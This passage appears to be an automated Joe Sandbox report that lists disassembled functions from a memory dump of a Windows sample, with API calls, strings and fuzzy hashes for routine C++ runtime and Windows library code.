                                                                  • LeaveCriticalSection.KERNEL32(00B7DD3C,?,?,00B42CBD,00000064,?,?,?,00B223B6,00B7E638,823FDEC6,?,?,00B63D6D,000000FF), ref: 00B42D4D
                                                                  • WaitForSingleObjectEx.KERNEL32(?,00000000,?,00B42CBD,00000064,?,?,?,00B223B6,00B7E638,823FDEC6,?,?,00B63D6D,000000FF), ref: 00B42D5E
                                                                  • EnterCriticalSection.KERNEL32(00B7DD3C,?,00B42CBD,00000064,?,?,?,00B223B6,00B7E638,823FDEC6,?,?,00B63D6D,000000FF), ref: 00B42D65
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
                                                                  • String ID:
                                                                  • API String ID: 3269011525-0
                                                                  • Opcode ID: d4d4a5e16fbeed788ddca84f0a97ee79e1c2eecee95a2b7aee1350d63cbce7e0
                                                                  • Instruction ID: 4056a53c670e9665c010d73355c5445f24f7794ef0474d4ac2efdbf8f4a553d5
                                                                  • Opcode Fuzzy Hash: d4d4a5e16fbeed788ddca84f0a97ee79e1c2eecee95a2b7aee1350d63cbce7e0
                                                                  • Instruction Fuzzy Hash: 2BE04832585524FBCB322B54EC08A9E3F79EF05B95B0040F1F50D671B1CFA55A409BE1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • __EH_prolog3_GS.LIBCMT ref: 00B2EC8E
                                                                    • Part of subcall function 00B2D87C: __EH_prolog3.LIBCMT ref: 00B2D883
                                                                    • Part of subcall function 00B2D87C: std::_Lockit::_Lockit.LIBCPMT ref: 00B2D88D
                                                                    • Part of subcall function 00B2D87C: std::_Lockit::~_Lockit.LIBCPMT ref: 00B2D8FE
                                                                  • _Find_elem.LIBCPMT ref: 00B2EE8A
                                                                  Strings
                                                                  • 0123456789ABCDEFabcdef-+Xx, xrefs: 00B2ECF6
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: Lockitstd::_$Find_elemH_prolog3H_prolog3_Lockit::_Lockit::~_
                                                                  • String ID: 0123456789ABCDEFabcdef-+Xx
                                                                  • API String ID: 2544715827-2799312399
                                                                  • Opcode ID: ff5ea228b7adff5152dd96b657396dd584260e56b49bee3bd9c7416847635c6e
                                                                  • Instruction ID: fb123db7a0e7c2af36f7c65588c34efb96eb5d308d589612934a183c56aa6b05
                                                                  • Opcode Fuzzy Hash: ff5ea228b7adff5152dd96b657396dd584260e56b49bee3bd9c7416847635c6e
                                                                  • Instruction Fuzzy Hash: 34C18334D042A88AEF15EFA5E5507ECBBF2AF55300F2940E9D8A96B243C734DD46C751
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • __EH_prolog3_GS.LIBCMT ref: 00B362C8
                                                                    • Part of subcall function 00B32D74: __EH_prolog3.LIBCMT ref: 00B32D7B
                                                                    • Part of subcall function 00B32D74: std::_Lockit::_Lockit.LIBCPMT ref: 00B32D85
                                                                    • Part of subcall function 00B32D74: std::_Lockit::~_Lockit.LIBCPMT ref: 00B32DF6
                                                                  • _Find_elem.LIBCPMT ref: 00B36502
                                                                  Strings
                                                                  • 0123456789ABCDEFabcdef-+Xx, xrefs: 00B3633F
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: Lockitstd::_$Find_elemH_prolog3H_prolog3_Lockit::_Lockit::~_
                                                                  • String ID: 0123456789ABCDEFabcdef-+Xx
                                                                  • API String ID: 2544715827-2799312399
                                                                  • Opcode ID: 1e3ab7f8948a3bee7bfff94aba4c9b2c8803221a30ed258014383898c5c24e0c
                                                                  • Instruction ID: 50316394fcb312761cf160616e7b46ec305f309de875fedfb40498d9388c9da1
                                                                  • Opcode Fuzzy Hash: 1e3ab7f8948a3bee7bfff94aba4c9b2c8803221a30ed258014383898c5c24e0c
                                                                  • Instruction Fuzzy Hash: 0BC17270E04258AADF259F68C8817ECBBF1BF11304F64C0D9D889AB386DB749D85CB54
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • __EH_prolog3_GS.LIBCMT ref: 00B3669E
                                                                    • Part of subcall function 00B2B8B0: std::_Lockit::_Lockit.LIBCPMT ref: 00B2B8DD
                                                                    • Part of subcall function 00B2B8B0: std::_Lockit::_Lockit.LIBCPMT ref: 00B2B900
                                                                    • Part of subcall function 00B2B8B0: std::_Lockit::~_Lockit.LIBCPMT ref: 00B2B928
                                                                    • Part of subcall function 00B2B8B0: std::_Lockit::~_Lockit.LIBCPMT ref: 00B2B9B7
                                                                  • _Find_elem.LIBCPMT ref: 00B368D8
                                                                  Strings
                                                                  • 0123456789ABCDEFabcdef-+Xx, xrefs: 00B36715
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: Lockitstd::_$Lockit::_Lockit::~_$Find_elemH_prolog3_
                                                                  • String ID: 0123456789ABCDEFabcdef-+Xx
                                                                  • API String ID: 3042121994-2799312399
                                                                  • Opcode ID: 60b521ffba782ba7dd5e31daf2edd5d6698e94671651b1c121fc46346abf8b73
                                                                  • Instruction ID: 5b1f96b980daf64a8978216a322fae2c841ac663ff8d054a786daf57c0ea193b
                                                                  • Opcode Fuzzy Hash: 60b521ffba782ba7dd5e31daf2edd5d6698e94671651b1c121fc46346abf8b73
                                                                  • Instruction Fuzzy Hash: 7CC17230E04258ABDF259F64C8917ACBBF2FF55304F64C1DAD889AB282DB749D85CB50
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • __startOneArgErrorHandling.LIBCMT ref: 00B51AFD
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorHandling__start
                                                                  • String ID: pow
                                                                  • API String ID: 3213639722-2276729525
                                                                  • Opcode ID: 3ad6e5e56230b20eaef4ccd19154a982588d1e0d51e072069d52fd7b306a448d
                                                                  • Instruction ID: 7909694e70566e1ad3ea9b4d8861c647b74ba03404be2ba8e25dabef4f03ddc2
                                                                  • Opcode Fuzzy Hash: 3ad6e5e56230b20eaef4ccd19154a982588d1e0d51e072069d52fd7b306a448d
                                                                  • Instruction Fuzzy Hash: AA515A61A091019ACB12771CC95137A6BE4EB40703F204FD9ECD1962E9EF368CDD9A4B
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: __aulldiv
                                                                  • String ID: -$0123456789abcdefghijklmnopqrstuvwxyz
                                                                  • API String ID: 3732870572-1956417402
                                                                  • Opcode ID: 7f5b1617366d2b43421e3c184f17b31d26585b0d6f4451cf826cc0bf80851ce8
                                                                  • Instruction ID: 0c95ff44273f1044edecfe4fbb399fe1dd40a97c175048a49b5ed8dbffef7dc1
                                                                  • Opcode Fuzzy Hash: 7f5b1617366d2b43421e3c184f17b31d26585b0d6f4451cf826cc0bf80851ce8
                                                                  • Instruction Fuzzy Hash: 2751BF30F04285AADF258FAC84817BEBFF9AF05340F5448DAE891D7241C7758B86EB61
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 00B2BF6E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: Concurrency::cancel_current_task
                                                                  • String ID: false$true
                                                                  • API String ID: 118556049-2658103896
                                                                  • Opcode ID: 59e4010215a3141cce08d13d82345839899d948b1e1f8ef04886fe37fb8ad2b4
                                                                  • Instruction ID: 9dae734a96083f673ad8dac3950a9c25b524db436c13347eccdb5f74644433a6
                                                                  • Opcode Fuzzy Hash: 59e4010215a3141cce08d13d82345839899d948b1e1f8ef04886fe37fb8ad2b4
                                                                  • Instruction Fuzzy Hash: 0351D8B1D007589FDB10DFA4C941BEEBBF8FF05300F1486AAE849A7241E774A645CB91
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: \\?\$\\?\UNC\
                                                                  • API String ID: 0-3019864461
                                                                  • Opcode ID: a4ffc64d78b0c1df7387c8cbc8a1e0d05f09fdabbcdab8f9a9bb738a38ef6189
                                                                  • Instruction ID: 8a1d165370323560246c20ffc16f4f5138c79cf956fb4251b155e772e9584e9d
                                                                  • Opcode Fuzzy Hash: a4ffc64d78b0c1df7387c8cbc8a1e0d05f09fdabbcdab8f9a9bb738a38ef6189
                                                                  • Instruction Fuzzy Hash: 0F510270A442249BDB14CF64E885BEEB7F5FF99304F10459DE40AB7290DFB46984CB98
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • __EH_prolog3_GS.LIBCMT ref: 00B3D501
                                                                  • _swprintf.LIBCMT ref: 00B3D573
                                                                    • Part of subcall function 00B3254E: __EH_prolog3.LIBCMT ref: 00B32555
                                                                    • Part of subcall function 00B3254E: std::_Lockit::_Lockit.LIBCPMT ref: 00B3255F
                                                                    • Part of subcall function 00B3254E: std::_Lockit::~_Lockit.LIBCPMT ref: 00B325D0
                                                                    • Part of subcall function 00B32FC8: __EH_prolog3.LIBCMT ref: 00B32FCF
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: H_prolog3Lockitstd::_$H_prolog3_Lockit::_Lockit::~__swprintf
                                                                  • String ID: %.0Lf
                                                                  • API String ID: 3050236999-1402515088
                                                                  • Opcode ID: c0543086663747fb69594ea547407796e8294431db4b638586f3cd6ff03a3e57
                                                                  • Instruction ID: c6b5e30470edff2b0b2efd2ce767fa506f1ecd1d46d977061bbbd9f65110fede
                                                                  • Opcode Fuzzy Hash: c0543086663747fb69594ea547407796e8294431db4b638586f3cd6ff03a3e57
                                                                  • Instruction Fuzzy Hash: B9417971E00218ABCF05EFE0D895ADD7BF5FF18304F208589E846AB295DB75AA15CF90
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • __EH_prolog3_GS.LIBCMT ref: 00B3D7A5
                                                                  • _swprintf.LIBCMT ref: 00B3D817
                                                                    • Part of subcall function 00B28610: std::_Lockit::_Lockit.LIBCPMT ref: 00B28657
                                                                    • Part of subcall function 00B28610: std::_Lockit::_Lockit.LIBCPMT ref: 00B28679
                                                                    • Part of subcall function 00B28610: std::_Lockit::~_Lockit.LIBCPMT ref: 00B286A1
                                                                    • Part of subcall function 00B28610: std::_Lockit::~_Lockit.LIBCPMT ref: 00B2880E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3__swprintf
                                                                  • String ID: %.0Lf
                                                                  • API String ID: 1487807907-1402515088
                                                                  • Opcode ID: 2a805786b71cc5937bf78b2f88ec58fe997e5dbdca2d447dc9cc7125daf803df
                                                                  • Instruction ID: 1f141ba6c9b9b968191479215b33c1f58770884faf0c2a060a521b0265193f76
                                                                  • Opcode Fuzzy Hash: 2a805786b71cc5937bf78b2f88ec58fe997e5dbdca2d447dc9cc7125daf803df
                                                                  • Instruction Fuzzy Hash: 6B418A71E00218ABCF05EFE4EC55ADD7BB5FF08300F204589E849AB295EB74AA15CF90
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • __EH_prolog3_GS.LIBCMT ref: 00B4188E
                                                                  • _swprintf.LIBCMT ref: 00B41900
                                                                    • Part of subcall function 00B29270: std::_Lockit::_Lockit.LIBCPMT ref: 00B292A0
                                                                    • Part of subcall function 00B29270: std::_Lockit::_Lockit.LIBCPMT ref: 00B292C2
                                                                    • Part of subcall function 00B29270: std::_Lockit::~_Lockit.LIBCPMT ref: 00B292EA
                                                                    • Part of subcall function 00B29270: std::_Lockit::~_Lockit.LIBCPMT ref: 00B29422
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3__swprintf
                                                                  • String ID: %.0Lf
                                                                  • API String ID: 1487807907-1402515088
                                                                  • Opcode ID: 0f130c915b2cf208925448421938c3cf83fd9783900869b2b6490a3730fe90e2
                                                                  • Instruction ID: 19ddfbdf0fcd3f76998f4c69850703b70f387ec498015a58ec9c152867f550e2
                                                                  • Opcode Fuzzy Hash: 0f130c915b2cf208925448421938c3cf83fd9783900869b2b6490a3730fe90e2
                                                                  • Instruction Fuzzy Hash: 0B418A71E00308ABCF05EFD4D894ADD7BB5FF08300F208989E816AB295DB759A55DF90
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00B4607E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: EncodePointer
                                                                  • String ID: MOC$RCC
                                                                  • API String ID: 2118026453-2084237596
                                                                  • Opcode ID: 04e5bf2912efbb0a6e219e3f814446417a3ec7797bdaa275ce8c4d78a86a0543
                                                                  • Instruction ID: ad625535717c2db5223aac8f00f82d7cba98e8a387e90fac542d73192b89c1fb
                                                                  • Opcode Fuzzy Hash: 04e5bf2912efbb0a6e219e3f814446417a3ec7797bdaa275ce8c4d78a86a0543
                                                                  • Instruction Fuzzy Hash: AC413771900209EFCF25DF98CC81AAEBBF5EF49304F188199F90877252D7359A51EB52
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: H_prolog3___cftoe
                                                                  • String ID: !%x
                                                                  • API String ID: 855520168-1893981228
                                                                  • Opcode ID: 83ec10e44f23eda15770ce520ccdb93ff213da132bcf5fa3eba91f1d3fb3b733
                                                                  • Instruction ID: 2af841c39bcd24faae1c2dfd2c8d24d0e0cd98fcfb2f106bdd802cc3ed944f73
                                                                  • Opcode Fuzzy Hash: 83ec10e44f23eda15770ce520ccdb93ff213da132bcf5fa3eba91f1d3fb3b733
                                                                  • Instruction Fuzzy Hash: 96314971D0020DABDF04DF94E981AEEB7F6FF08304F20449AF915A7251DB75AA45CB64
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: H_prolog3___cftoe
                                                                  • String ID: !%x
                                                                  • API String ID: 855520168-1893981228
                                                                  • Opcode ID: b4d873e901f66fe8f2ebc07bf0e3417529dc2fd3b33cf0ef8c669abb6179e1d0
                                                                  • Instruction ID: 6fd5fd552f077e7dbfdaf1236804144cb31857a2cda0671c7f3a951733823607
                                                                  • Opcode Fuzzy Hash: b4d873e901f66fe8f2ebc07bf0e3417529dc2fd3b33cf0ef8c669abb6179e1d0
                                                                  • Instruction Fuzzy Hash: 09318A32D1525CAFDF00DF98E881AEEBBF5EF09300F140499F854A7242D7759A85DBA0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • ConvertSidToStringSidW.ADVAPI32(?,00000000), ref: 00B25F86
                                                                  • LocalFree.KERNEL32(00000000,Invalid SID,0000000B,?,00000000,823FDEC6), ref: 00B25FF6
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: ConvertFreeLocalString
                                                                  • String ID: Invalid SID
                                                                  • API String ID: 3201929900-130637731
                                                                  • Opcode ID: c50712a36b589c7c3f4cab1af49560719567bd66ee9bc6caf52f61b8266b04ce
                                                                  • Instruction ID: b32b49b08ac2e3f256b5615a0b281dbab1716ab9701a8e17f4beab545406b155
                                                                  • Opcode Fuzzy Hash: c50712a36b589c7c3f4cab1af49560719567bd66ee9bc6caf52f61b8266b04ce
                                                                  • Instruction Fuzzy Hash: 2F21D270A04615DBDB20DF58D815BAFBBF8FF44714F10065DE519A7380DBB96A448BD0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00B2909B
                                                                  • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00B290FE
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: std::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                                                  • String ID: bad locale name
                                                                  • API String ID: 3988782225-1405518554
                                                                  • Opcode ID: 02db0d2898a2bc2763cc3c9daac6749d038be843c840bbc0532ce99e63a31004
                                                                  • Instruction ID: 9ee476defff7f7458dc92e65a07cf21586c4fd7d43850867b75c5040244574f8
                                                                  • Opcode Fuzzy Hash: 02db0d2898a2bc2763cc3c9daac6749d038be843c840bbc0532ce99e63a31004
                                                                  • Instruction Fuzzy Hash: 1C21D270905B84EED721CFA8C90474BBFF4EF19710F108A9DE49997781D3B5A604CBA1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: H_prolog3_
                                                                  • String ID: false$true
                                                                  • API String ID: 2427045233-2658103896
                                                                  • Opcode ID: ad90d1219858fc89d39df0856e91f21f3218963a204e968d9b320fa62b14c504
                                                                  • Instruction ID: 134ce517dba4ea6b3c3ec831661f0a943aaf5ac2a51a7071bc97bf64f44ccf09
                                                                  • Opcode Fuzzy Hash: ad90d1219858fc89d39df0856e91f21f3218963a204e968d9b320fa62b14c504
                                                                  • Instruction Fuzzy Hash: 2411B271941745AED720EFB4D841B9ABBF4AF05300F14CAAAF4A9DB351EB70E604CB90
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • LocalFree.KERNEL32(00000000,00B24261,00B64400,000000FF,823FDEC6,00000000,?,00000000,?,?,?,00B64400,000000FF,?,00B23A75,?), ref: 00B24096
